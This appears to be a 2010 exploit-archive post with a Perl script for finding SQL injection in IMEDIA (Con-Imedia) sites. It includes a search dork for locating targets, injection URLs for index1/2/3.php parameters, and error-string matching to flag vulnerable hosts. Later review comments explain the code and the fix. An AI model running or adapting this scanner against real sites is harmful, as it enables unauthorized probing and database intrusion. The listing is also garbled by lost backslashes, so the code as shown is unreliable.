
# Title : IMEDIA (index.php) SQL Injection Vulnerability
# Published : 2010-05-20
# Author : Kannibal615


# Exploit Title: IMEDIA (index.php) SQL Injection Vulnerability
# Date: 19-05-2010
# Author: Kannibal615
# Software Link: N/A
# Version: N/A
# Tested on: ALL
# CVE: N/A
# Code: 

# DORK : Powered by: Con-Imedia


#!usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

# Banner: clear the console, then print the author's ASCII-art logo, credits,
# the search dork, a usage line and the "k615>" input prompt.
# NOTE(review): every string below ends in a bare "n" where a newline escape
# would be expected; the backslashes were presumably lost when this page was
# extracted, so the listing as shown would not print line breaks. Confirm
# against an original copy before relying on the exact text.
# "cls" is the Windows console clear command; it goes through the shell via
# system() and its exit status is not checked.
system ("cls");
print "n";
print "  @@    @@  @@@@@@     @@    @@    @@@@    @@@@@@@  @@  @@   @@@@@@@  @@@@@n";
print "  @@    @@  @@   @@    @@    @@   @@  @@   @@       @@ @@    @@       @@   @@n";
print "  @@    @@  @@ @@@     @@@@@@@@  @@    @@  @@       @@@@     @@@@@@   @@   @@n";
print "   @@  @@   @@ @@@     @@@@@@@@  @@@@@@@@  @@       @@ @@    @@@@@@   @@ @@n";
print "    @@@@    @@   @@    @@    @@  @@    @@  @@       @@  @@   @@       @@   @@n";
print "     @@     @@@@@@     @@    @@  @@    @@  @@@@@@@  @@   @@  @@@@@@@  @@    @@nn";
print "                  LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAHnn";
print "nn";
print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]denn";
print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATORn";
# Single-quoted, so the "$_" inside this string is printed literally instead
# of being interpolated.
print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru$_T4ckJ3n';
print "n[*]Greetz 3: To All VBHACKER.NET Membersn";
print "[*]Dork    : Powered by: Con-Imedian";
print "[*]Usage   : k615>[target here]n";
print "[*]Exemple : k615> www.target.comn";
print "n";
# Prompt for the base address; the value is read right after the banner.
print "k615>";

# Read the base address from the first line of input (<> reads the files named
# on the command line, or STDIN when there are none) and strip the newline.
# $input is an undeclared package global; no "use strict" appears in the
# listing, so typos in variable names would go unnoticed.
$input=<>;
chomp $input;

# Prepend "http://" unless the value already starts with "http:". Nothing else
# about the value is validated; an "https://" address does not match this
# pattern and would therefore get "http://" put in front of it as well.
if ( $input !~ /^http:/ ) {
$input = 'http://' . $input;
}
# Append a trailing slash when one is missing.
# NOTE(review): the pattern is shown as //$/, which is not a valid match as
# written; it was presumably /\/$/ before the backslash was lost in
# extraction. Confirm against an original copy.
if ( $input !~ //$/ ) {
$input = $input . '/';
}


# Relative URLs to request: index1.php, index2.php and index3.php with the
# linkid / sublinkid / sublink / day query parameters set to 999.9 followed by
# a double quote. The unbalanced quote is presumably meant to break a query
# that concatenates the parameter into SQL, so that a database error shows up
# in the returned page.
@path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"',
'index2.php?linkid=999.9"','index3.php?day=999.9"');

# For each entry: build the full URL, fetch it, and classify the response.
foreach $ways(@path){

# $final (a package global) is the normalised base address plus one path.
$final=$input.$ways;

# Plain GET through LWP. A new LWP::UserAgent is constructed on every
# iteration with a 30-second timeout. No User-Agent string is set, so LWP's
# default "libwww-perl/<version>" header is sent; together with the 999.9"
# parameter value this makes these requests straightforward to find in web
# server access logs.
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

# Heuristic check on the raw response body; the HTTP status is never looked
# at, so an error page from a failed request is matched like any other body.
# Any single match marks the URL as vulnerable. /sql/, /SQL/, /syntax/ and
# /fetch/ are bare, case-sensitive substrings, so ordinary pages that merely
# contain those words are reported too, and a "[+]" line is only a hint, not
# a confirmation. Every pattern that contains "SQL" (including the long
# MySQL error text) is already covered by /SQL/ and adds nothing.
# What the check keys on is the application echoing database error text to
# the client: parameterised queries remove the underlying flaw, and generic
# error pages remove this signal.
if($response->content =~ /sql/ ||
$response->content =~ /SQL error/ ||
$response->content =~ /SQL/ ||
$response->content =~ /syntax/ ||
$response->content =~ /Invalid query/ ||
$response->content =~ /your SQL/ ||
$response->content =~ /MySQL/ ||
$response->content =~ /at line 1/ ||
$response->content =~ /MySQL server/ ||
$response->content =~ /version for/ ||
$response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ ||
$response->content =~ /fetch/
){
# NOTE(review): as shown, "$finaln" names a different, unset variable, so the
# URL would not be printed; this was presumably "$final\n" before the
# backslash was lost in extraction. The same applies to the else branch.
print "[+] Vulnerable -> $finaln";
}
else{
print "[-] Not Vulner <- $finaln";
}
}
# Closing message, then block on one more line of input so the console window
# stays open until Enter is pressed; the value read into $enter is not used.
print "nnSOBHAN ALLAHn";
print "press enter to exit";
$enter=<>;




#db-exploit 19-05-2010
#Coded By Kannibal615
#Tunisian Genius Security